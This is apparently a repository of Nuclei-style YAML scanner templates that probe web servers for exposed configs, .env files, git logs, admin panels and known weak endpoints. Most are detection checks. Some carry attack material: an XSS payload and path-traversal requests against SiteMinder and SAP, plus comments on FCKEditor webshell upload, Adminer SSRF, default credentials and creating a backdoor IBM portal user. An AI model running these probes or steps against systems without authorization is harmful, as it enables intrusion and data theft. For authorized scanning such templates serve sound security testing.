├── Actuator.yaml
├── CellPower-Agent.yaml
├── Cloudify-login.yaml
├── DOM-XSS-SiteMinder.yaml
├── Dir-Contents-Disc-logs.yaml
├── FCKEditor-Exposed.yaml
├── File-manager-search.yaml
├── Find-wp-config-backup.yaml
├── Get-Env.yaml
├── Git-search-logs.yaml
├── IBM-Signup-Exposure.yaml
├── Kronos-wsld-exposure.yaml
├── Letter-Opener-Exposed.yaml
├── OpenText-LiveSite-TeamSite-Database-info-Exposure.yaml
├── ProfileService.yaml
├── RedCap-Install-Module.yaml
├── SAP-Path-Traversal.yaml
├── Web-xml-finder.yaml
├── WordPress-Fancy-Product-Designer-IOC.yaml
├── Workfront-dev-backend.yaml
├── adminer.php.yaml
├── dashboard-exposed.yaml
├── elmah-PartnerPortal.yaml
├── find-config.xml copy.yaml
├── find-config.xml.yaml
├── killswitch.yaml
├── phpmyadmin.yaml
├── sam-search.yaml
└── siteminderagent.yaml
/Actuator.yaml:
--------------------------------------------------------------------------------
1 | id: Finds actuator
2 | info:
3 | name: Actuator info leakage
4 | author: Clark
5 | severity: medium
6 | #Look in for exposed info.
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/actuator"
11 | - "{{BaseURL}}/actuator/caches"
12 | - "{{BaseURL}}/actuator/configprops"
13 | - "{{BaseURL}}/actuator/conditions"
14 | - "{{BaseURL}}/actuator/env"
15 | - "{{BaseURL}}/actuator/beans"
16 | - "{{BaseURL}}/actuator/info"
17 | - "{{BaseURL}}/actuator/scheduledtasks"
18 | - "{{BaseURL}}/actuator/features"
19 | - "{{BaseURL}}/actuator/refresh"
20 | - "{{BaseURL}}/actuator/metrics"
21 | - "{{BaseURL}}/actuator/loggers"
22 | - "{{BaseURL}}/actuator/mappings"
23 | - "{{BaseURL}}/actuator/threaddump"
24 |
25 | matchers-condition: and
26 | matchers:
27 | - type: word
28 | words:
29 | - actuator
30 | condition: and
31 |
32 | - type: status
33 | status:
34 | - 200
35 |
--------------------------------------------------------------------------------
/CellPower-Agent.yaml:
--------------------------------------------------------------------------------
1 | id: CellPower Agent backend info exposure
2 | info:
3 | name: CellPower Agent sensitive info exposure
4 | author: Clark
5 | severity: high
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/user/ajax"
10 | - "{{BaseURL}}/user/confirm-activation"
11 | - "{{BaseURL}}/user/settings"
12 | - "{{BaseURL}}/user/create-success"
13 |
14 | matchers-condition: and
15 | matchers:
16 | - type: word
17 | words:
18 | - array
19 | condition: and
20 |
21 | - type: status
22 | status:
23 | - 200
--------------------------------------------------------------------------------
/Cloudify-login.yaml:
--------------------------------------------------------------------------------
1 | id: Cloudify login Exposed (Try default creds)
2 | info:
3 | name: Cloudify login
4 | author: Clark
5 | severity: medium
6 |
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/console/login"
11 |
12 | matchers-condition: and
13 | matchers:
14 |
15 | - type: word
16 | words:
17 | - "Cloudify Console"
18 |
19 | - type: status
20 | status:
21 | - 200
--------------------------------------------------------------------------------
/DOM-XSS-SiteMinder.yaml:
--------------------------------------------------------------------------------
1 | id: siteminder-dom-based-xss
2 |
3 | info:
4 | name: SiteMinder DOM BASED XSS
5 | author: Clark
6 | severity: medium
7 | description: SiteMinder DOM Based XSS.
8 | tags: dom,xss
9 | reference: https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
15 | - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
16 |
17 | matchers-condition: and
18 | matchers:
19 | - type: status
20 | status:
21 | - 200
22 |
23 | - type: word
24 | words:
25 | - 'confirm(document.domain)'
26 |
27 | - type: word
28 | words:
29 | - 'text/html'
30 | part: header
31 |
--------------------------------------------------------------------------------
/Dir-Contents-Disc-logs.yaml:
--------------------------------------------------------------------------------
1 | id: Directory Content logs
2 | info:
3 | name: Search for log.txt
4 | author: Clark
5 | severity: medium
6 |
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/log/log.txt"
11 |
12 | matchers-condition: and
13 | matchers:
14 |
15 | - type: word
16 | words:
17 | - log
18 |
19 | - type: status
20 | status:
21 | - 200
22 |
23 | - type: word
24 | words:
25 | - 'text/plain'
26 | part: header
27 |
--------------------------------------------------------------------------------
/FCKEditor-Exposed.yaml:
--------------------------------------------------------------------------------
1 | id: FCKEditor Core Exposure
2 |
3 | info:
4 | name: FCKEditor Core
5 | author: Clark
6 | severity: info
7 | #create a htaccess file:code: SetHandler application/x-httpd-php
8 | #Now upload shell.php.gif with FCKeditor. After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically, http://target.com/anything/shell_php.gif, Now shell is available from server.
9 | #https://www.exploit-db.com/exploits/17644
10 | #https://www.exploit-db.com/exploits/15484
11 | #https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/1003-exploits/fckeditor-shell.txt,Sample Backdoor:(save as "any_name.php3")
12 | requests:
13 | - method: GET
14 | path:
15 | - "{{BaseURL}}/fckeditor/editor/filemanager/upload/test.html"
16 | - "{{BaseURL}}/fckeditor/editor/filemanager/browser/default/connectors/test.html"
17 | - "{{BaseURL}}/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media"
18 | - "{{BaseURL}}/fckeditor/editor/filemanager/connectors/aspx/upload.aspx"
19 | - "{{BaseURL}}/fckeditor/editor/filemanager/connectors/aspx/connector.aspx"
20 | - "{{BaseURL}}/fckeditor/editor/filemanager/browser/default/js/fckxml.js"
21 | - "{{BaseURL}}/fckeditor/editor/filemanager/browser/default/browser.html?Connector=/editor/filemanager/browser/default/connectors/php/connector.php"
22 |
23 | matchers-condition: and
24 | matchers:
25 |
26 | - type: word
27 | words:
28 | - fckeditor
29 | condition: or
30 |
31 | - type: status
32 | status:
33 | - 200
34 | condition: or
--------------------------------------------------------------------------------
/File-manager-search.yaml:
--------------------------------------------------------------------------------
1 | id: FIle Manager exposed
2 | info:
3 | name: Search for FIle Manager
4 | author: Clark
5 | severity: medium
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/editor/editor/filemanager/browser/default/js/fckxml.js"
10 | - "{{BaseURL}}/editor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"
11 | - "{{BaseURL}}/editor/editor/filemanager/connectors/php/upload.php"
12 | - "{{BaseURL}}/editor/editor/filemanager/browser/default/browser.html"
13 |
14 | matchers-condition: and
15 | matchers:
16 | - type: word
17 | words:
18 | - "FCKeditor"
19 | - "executing"
20 | condition: and
21 |
22 | - type: status
23 | status:
24 | - 200
25 |
26 |
--------------------------------------------------------------------------------
/Find-wp-config-backup.yaml:
--------------------------------------------------------------------------------
1 | id: wp-config backup Exposed
2 | info:
3 | name: Find wp-config backup
4 | author: Clark
5 | severity: medium
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/wp-config.php.bak"
10 |
11 | matchers-condition: and
12 | matchers:
13 | - type: word
14 | words:
15 | - dev
16 | condition: and
17 |
18 | - type: status
19 | status:
20 | - 200
21 |
--------------------------------------------------------------------------------
/Get-Env.yaml:
--------------------------------------------------------------------------------
1 | id: Env Exposed
2 | info:
3 | name: Find Exposed Env
4 | author: Clark
5 | severity: medium
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/.env"
10 |
11 | matchers-condition: and
12 | matchers:
13 | - type: word
14 | words:
15 | - ADMIN_USER
16 | condition: and
17 |
18 | - type: status
19 | status:
20 | - 200
21 |
--------------------------------------------------------------------------------
/Git-search-logs.yaml:
--------------------------------------------------------------------------------
1 | id: Git logs found
2 | info:
3 | name: Find Git log exposure
4 | author: Clark
5 | severity: medium
6 |
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/.git/logs/HEAD"
11 | - "{{BaseURL}}/.git/COMMIT_EDITMSG"
12 | - "{{BaseURL}}/.git/index"
13 | - "{{BaseURL}}/.git/logs/refs/heads/master"
14 | - "{{BaseURL}}/config.php~"
15 | - "{{BaseURL}}/.git/COMMIT_EDITMSG"
16 | - "{{BaseURL}}/.git/config"
17 | - "{{BaseURL}}/.git/FETCH_HEAD"
18 | - "{{BaseURL}}/.git/logs/refs/remotes/origin/master"
19 | - "{{BaseURL}}/.git/refs/heads/master"
20 | - "{{BaseURL}}/.git/refs/remotes/origin/master"
21 | - "{{BaseURL}}/log/access.log"
22 | - "{{BaseURL}}/.git/info/exclude"
23 | - "{{BaseURL}}/log/error.log"
24 | - "{{BaseURL}}/log/php_errorlog"
25 | - "{{BaseURL}}/readme.md"
26 | - "{{BaseURL}}/readme.txt"
27 | - "{{BaseURL}}/.git/description"
28 | - "{{BaseURL}}/.gitignore"
29 | - "{{BaseURL}}/.git/refs/tags"
30 | - "{{BaseURL}}/.git/packed-refs"
31 |
32 | matchers-condition: and
33 | matchers:
34 | - type: status
35 | status:
36 | - 200
37 |
38 | - type: word
39 | words:
40 | - 'root'
41 | - 'commint'
42 | - 'git'
43 | - 'COMMIT_EDITMSG'
44 | - 'pack-refs'
45 | - 'gitignore'
46 |
47 | part: body
48 |
--------------------------------------------------------------------------------
/IBM-Signup-Exposure.yaml:
--------------------------------------------------------------------------------
1 | id: IBM friendly path exposure
2 | info:
3 | name: Finds friendly path exposed, leads to user sign-up page to create backdoor user.
4 | author: Clark Voss
5 | severity: medium
6 | reference: https://clarkvoss.medium.com/how-to-harpon-big-blue-c163722638d8
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2"
13 | - "{{BaseURL}}/wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2"
14 | - "{{BaseURL}}/wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/#Z7_00000000000000A0BR2B300IO0"
15 | - "{{BaseURL}}/wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/#Z7_00000000000000A0BR2B300IO0"
16 | - "{{BaseURL}}/wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/#Z7_00000000000000A0BR2B300IO0"
17 |
18 | matchers:
19 | - type: word
20 | words:
21 | - "Edit My Profile"
22 | - "Friendly path"
23 | - "IBM WebSphere Portal"
24 | - "Sign Up"
25 | - "http://www.ibm.com/websphere/developer/zones/portal/"
26 | - "http://www.ibm.com/software/genservers/portal/support/"
27 |
28 | part: body
29 | - type: status
30 | status:
31 | - 200
32 |
--------------------------------------------------------------------------------
/Kronos-wsld-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: Kronos wsdl found
2 | info:
3 | name: Find Kronos wsdl exposure (Try XXE)
4 | author: Clark
5 | severity: medium
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/wfc/webservice/ReportConfigService?wsdl"
10 | - "{{BaseURL}}/wfc/XmlService"
11 | - "{{BaseURL}}/wfc/"
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - "xml-soap"
17 | - "application/xml"
18 | part: body
19 |
--------------------------------------------------------------------------------
/Letter-Opener-Exposed.yaml:
--------------------------------------------------------------------------------
1 | id: Letter Opener Web Exposed
2 | info:
3 | name: Finds Letter Opener Web Exposed
4 | author: Clark
5 | severity: medium
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/letter_opener/"
10 |
11 | matchers-condition: and
12 | matchers:
13 | - type: word
14 | words:
15 | - letter opener
16 | condition: and
17 |
18 | - type: status
19 | status:
20 | - 200
21 |
--------------------------------------------------------------------------------
/OpenText-LiveSite-TeamSite-Database-info-Exposure.yaml:
--------------------------------------------------------------------------------
1 | id: OpenText LiveSites TeamSite database info exposed
2 |
3 | info:
4 | name: OpenText LiveSite TeamSite database info exposed.
5 | author: Clark
6 | severity: medium
7 | description: Can find database connection info.
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}//iw-cc//WEB-INF/conf/livesite/resources/resource-config.xml'
13 | - '{{BaseURL}}//iw-cc//WEB-INF/web.xml'
14 | - '{{BaseURL}}//iw-cc//WEB-INF/conf/livesite_customer/database.properties'
15 |
16 | matchers-condition: and
17 | matchers:
18 | - type: status
19 | status:
20 | - 200
21 |
22 | - type: word
23 | words:
24 | - 'Interwoven Process Model Web View'
25 | - 'database.properties.template'
26 | - 'resource-config.xml'
27 |
28 | - type: word
29 | words:
30 | - 'application/xml'
31 | - 'text/plain'
32 | part: header
33 |
--------------------------------------------------------------------------------
/ProfileService.yaml:
--------------------------------------------------------------------------------
1 | id: Find ProfileService
2 | info:
3 | name: Find WSLD Profile Service exposed
4 | author: Clark
5 | severity: medium
6 |
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/services/profileService"
11 |
12 | matchers-condition: and
13 | matchers:
14 | - type: word
15 | words:
16 | - soapenv
17 | condition: and
18 |
19 | - type: status
20 | status:
21 | - 200
22 |
--------------------------------------------------------------------------------
/RedCap-Install-Module.yaml:
--------------------------------------------------------------------------------
1 | id: RedCap Install Mode
2 |
3 | info:
4 | name: RedCap Install Module Exposed Can redirect site
5 | author: Clark
6 | severity: medium
7 | description: Can redirect site using REDCap base URL.
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/install.php'
13 | - '{{BaseURL}}/redcap/install.php'
14 |
15 | matchers-condition: and
16 | matchers:
17 | - type: status
18 | status:
19 | - 200
20 |
21 | - type: word
22 | words:
23 | - 'Installation Module'
24 |
25 | - type: word
26 | words:
27 | - 'text/html'
28 | part: header
--------------------------------------------------------------------------------
/SAP-Path-Traversal.yaml:
--------------------------------------------------------------------------------
1 | id: SAP Path Traversal
2 |
3 | info:
4 | name: SAP Path Traversal
5 | author: Clark
6 | severity: medium
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - '{{BaseURL}}/scheduler/ui/js/?\&..\\\&..\\\&..\\\version.txt'
12 | - '{{BaseURL}}/scheduler/ui/js/UIUtilJavaScriptJS?\&..\\\&..\\\&..\\\version.txt'
13 | - '{{BaseURL}}/scheduler/ui/js/4c540510/UIUtilJavaScriptJS?\&..\\\&..\\\&..\\\version.txt'
14 | - '{{BaseURL}}/scheduler/ui/js/ffffffffbac53543/UIUtilJavaScriptJS?\&..\\\&..\\\&..\\\version.txt'
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - "Build"
20 | part: body
21 |
22 | - type: word
23 | words:
24 | - 'text/plain'
25 | part: header
26 |
--------------------------------------------------------------------------------
/Web-xml-finder.yaml:
--------------------------------------------------------------------------------
1 | id: web.xml Exposed
2 | info:
3 | name: Find web.xml found
4 | author: Clark
5 | severity: medium
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/iw-cc/WEB-INF/web.xml"
10 |
11 | matchers-condition: and
12 | matchers:
13 | - type: word
14 | words:
15 | - contextConfigLocation
16 | condition: and
17 |
18 | - type: status
19 | status:
20 | - 200
21 |
--------------------------------------------------------------------------------
/WordPress-Fancy-Product-Designer-IOC.yaml:
--------------------------------------------------------------------------------
1 | id: Search for IOC for Fancy Product Designer
2 | info:
3 | name: Find Indicators of Compromise for Fancy Product Designer
4 | author: Clark
5 | severity: High
6 |
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/2021/05/30/4fa00001c720b30102987d980e62d5e4.php"
11 | - "{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc"
12 | - "{{BaseURL}}/wp-admin/2021/05/31/4fa00001c720b30102987d980e62d5e4.php"
13 | - "{{BaseURL}}/wp-admin/2021/05/31/3783701c82396cc96d842839a291e813.php"
14 | - "{{BaseURL}}/wp-admin/2021/05/31/29da9e97d5efe5c9a8680c7066bb2840.php"
15 |
16 | matchers-condition: and
17 | matchers:
18 |
19 | - type: word
20 | words:
21 | - 'php'
22 | - 'class-debug.php'
23 | - 'settings'
24 |
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Workfront-dev-backend.yaml:
--------------------------------------------------------------------------------
1 | id: Backend Dev WorkFront Exposed
2 | info:
3 | name: Find WorkFront Dev Backend and works for Symfony panel.
4 | author: Clark
5 | severity: medium
6 |
7 | requests:
8 | - method: GET
9 | path:
10 | - '{{BaseURL}}/backend_dev.php/'
11 | - '{{BaseURL}}/backend.php'
12 |
13 | matchers-condition: and
14 | matchers:
15 |
16 | - type: word
17 | words:
18 | - 'backend_dev.php'
19 |
20 | - type: status
21 | status:
22 | - 200
23 |
--------------------------------------------------------------------------------
/adminer.php.yaml:
--------------------------------------------------------------------------------
1 | id: Find adminer dashboard
2 | info:
3 | name: Find adminer dashboard exposed
4 | author: Clark
5 | severity: medium
6 | #Server-side Request Forgery (SSRF) Try adminer.php?server=[payload]&username=123&password=123&db=123
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/adminer.php"
11 |
12 | matchers-condition: and
13 | matchers:
14 | - type: word
15 | words:
16 | - Adminer
17 | condition: and
18 |
19 | - type: status
20 | status:
21 | - 200
22 |
--------------------------------------------------------------------------------
/dashboard-exposed.yaml:
--------------------------------------------------------------------------------
1 | id: Dashboard Exposed bypassing authentication
2 | info:
3 | name: Find Exposed dashboard
4 | author: Clark
5 | severity: medium
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/dashboard"
10 |
11 | matchers-condition: and
12 | matchers:
13 | - type: word
14 | words:
15 | - dashboard
16 | condition: and
17 |
18 | - type: status
19 | status:
20 | - 200
21 |
--------------------------------------------------------------------------------
/elmah-PartnerPortal.yaml:
--------------------------------------------------------------------------------
1 | id: elmah.axd found in partnerportal
2 | info:
3 | name: Find partnerportal elmah.axd
4 | author: Clark
5 | severity: medium
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/MX/partnerportal/elmah.axd"
10 |
11 | matchers-condition: and
12 | matchers:
13 | - type: word
14 | words:
15 | - ELMAH
16 | condition: and
17 |
18 | - type: status
19 | status:
20 | - 200
21 |
--------------------------------------------------------------------------------
/find-config.xml copy.yaml:
--------------------------------------------------------------------------------
1 | id: Configuration displayed
2 | info:
3 | name: Finds config for
4 | author: Clark
5 | severity: medium
6 |
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/CaseManager/welcome/displayCmisConfig.jsp"
11 |
12 | matchers-condition: and
13 | matchers:
14 |
15 | - type: word
16 | words:
17 | - appSettings
18 |
19 | - type: status
20 | status:
21 | - 200
--------------------------------------------------------------------------------
/find-config.xml.yaml:
--------------------------------------------------------------------------------
1 | id: config.xml database info
2 | info:
3 | name: Search for config.xml
4 | author: Clark
5 | severity: medium
6 |
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/debug/config.xml"
11 |
12 | matchers-condition: and
13 | matchers:
14 |
15 | - type: word
16 | words:
17 | - appSettings
18 |
19 | - type: status
20 | status:
21 | - 200
--------------------------------------------------------------------------------
/killswitch.yaml:
--------------------------------------------------------------------------------
1 | id: Find killswitch dashboard
2 | info:
3 | name: Find killswitch dashboard exposed
4 | author: Clark
5 | severity: medium
6 | #Server-side Request Forgery (SSRF) Try adminer.php?server=[payload]&username=123&password=123&db=123
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/killswitch.aspx"
11 |
12 | matchers-condition: and
13 | matchers:
14 | - type: word
15 | words:
16 | - killswitch
17 | condition: and
18 |
19 | - type: status
20 | status:
21 | - 200
22 |
--------------------------------------------------------------------------------
/phpmyadmin.yaml:
--------------------------------------------------------------------------------
1 | id: Search for phpmyadmin setup page
2 | info:
3 | name: Find exposed phpmyadmin setup page
4 | author: Clark
5 | severity: medium
6 |
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/phpmyadmin/"
11 | - "{{BaseURL}}/phpmyadmin/index.php"
12 | - "{{BaseURL}}/phpmyadmin/setup"
13 |
14 | matchers-condition: and
15 | matchers:
16 |
17 | - type: word
18 | words:
19 | - sql
20 |
21 | - type: status
22 | status:
23 | - 200
--------------------------------------------------------------------------------
/sam-search.yaml:
--------------------------------------------------------------------------------
1 | id: saml Exposed
2 | info:
3 | name: Find saml
4 | author: Clark
5 | severity: medium
6 | requests:
7 | - method: GET
8 | path:
9 | - "{{BaseURL}}/saml/module.php/core/frontpage_welcome.php"
10 |
11 | matchers-condition: and
12 | matchers:
13 | - type: word
14 | words:
15 | - SimpleSAMLphp
16 | condition: and
17 |
18 | - type: status
19 | status:
20 | - 200
21 |
--------------------------------------------------------------------------------
/siteminderagent.yaml:
--------------------------------------------------------------------------------
1 | id: Siteminderagent exposed
2 | info:
3 | name: Find siteminderagent exposed
4 | author: Clark
5 | severity: medium
6 | #Look in for test keys, backup of the login.sfcc, and source code smformscgi.cpp
7 | requests:
8 | - method: GET
9 | path:
10 | - "{{BaseURL}}/siteminderagent/"
11 |
12 | matchers-condition: and
13 | matchers:
14 | - type: word
15 | words:
16 | - 'siteminder'
17 | - 'Server Error'
18 | condition: and
19 |
20 | - type: status
21 | status:
22 | - 200
23 | - 500
24 |
--------------------------------------------------------------------------------